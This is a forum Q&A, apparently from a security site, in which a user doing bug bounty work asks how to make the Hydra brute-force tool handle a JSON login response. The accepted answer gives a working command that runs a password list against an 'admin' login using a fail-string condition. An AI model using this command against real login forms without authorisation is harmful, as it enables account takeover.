How to run Hydra with json response?

Question

I've been doing some bug bounty hunting and have been having problems with hydra. So there is a https login form, request is :

https://bbsite/crp/login?password=pass&username=admin

Problem is that response is in json. So for bad login it is:

{"success":false,"greska":"Pogre\u0161no."}

So my solution was:

hydra  bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:{\"success\"\:false,\"greska\"\:\"Pogre\u0161no\"}" -l admin -P /root/Downloads/pass.txt

But this is not working, and I have no idea why. Can anyone suggest solution?

score 4 · Answer 1 · answered Mar 22 '16 at 16:09

4

Found solution:

hydra  bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:F={\"success\"\:false,\"greska\"\:\"Pogre\\\u0161no\"}" -l admin -P /root/Downloads/pass.txt

Needed to add F= for fail login. Needed to escape \ with \.

answered Mar 22 '16 at 16:09

Daniel Max

161
1
1
7

How to run Hydra with json response?

1 Answers1